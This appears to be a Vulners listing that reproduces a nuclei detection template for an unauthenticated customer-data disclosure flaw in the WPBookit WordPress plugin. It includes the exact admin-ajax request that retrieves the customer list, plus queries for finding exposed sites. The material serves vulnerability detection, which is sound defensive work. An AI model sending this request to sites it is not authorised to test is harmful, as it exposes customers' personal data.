Lucene search
+L

WPBookit <= 1.0.8 - Unauthenticated Customer Information Disclosure

🗓️ 22 Sep 2026 02:05:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

WPBookit plugin versions up to 1.0.8 exposes unauthenticated customer data via get_customer_list route.

Related
Refs
Code
id: CVE-2026-1980

info:
  name: WPBookit <= 1.0.8 - Unauthenticated Customer Information Disclosure
  author: aryu-ru
  severity: medium
  description: |
    WPBookit WordPress plugin <= 1.0.8 contains an information disclosure vulnerability caused by missing authorization check on 'get_customer_list' route, letting unauthenticated attackers retrieve sensitive customer data.
  impact: |
    Unauthenticated attackers can access sensitive customer information, risking privacy and data exposure.
  remediation: |
    Update to the latest version beyond 1.0.8.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1867c79-29d7-46a4-bfaf-c65e8a44c2ed?source=cve
    - https://plugins.trac.wordpress.org/browser/wpbookit/tags/1.0.8/core/admin/classes/class.wpb-admin-routes.php#L146
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1980
    - https://wordpress.org/plugins/wpbookit/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-1980
    epss-score: 0.00829
    epss-percentile: 0.55529
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    vendor: iqonicdesign
    product: wpbookit
    publicwww-query: "/wp-content/plugins/wpbookit/"
    fofa-query: body="/wp-content/plugins/wpbookit/"
  tags: cve,cve2026,wordpress,wp-plugin,wpbookit,unauth,disclosure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WPBookit")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lsversion
        group: 1
        internal: true
        regex:
          - '(?i)Stable tag:\s*([\w.]+)'

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&length=1&start=0 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "recordsTotal", "recordsFiltered", "user_registred")'
          - 'compare_versions(lsversion, ">= 1.0", "<= 1.0.8")'
        condition: and
# digest: 4a0a0047304502210094de5ea1940a92f1fd1fc330b8c52da4b07d2df429641979f1b548c93e280f040220211dadbb3f6b7c003ab38b0aa344d98685499225b821bc8be2777c054d4d9b2b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2026 07:13Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.15.3
EPSS0.00829
SSVC
11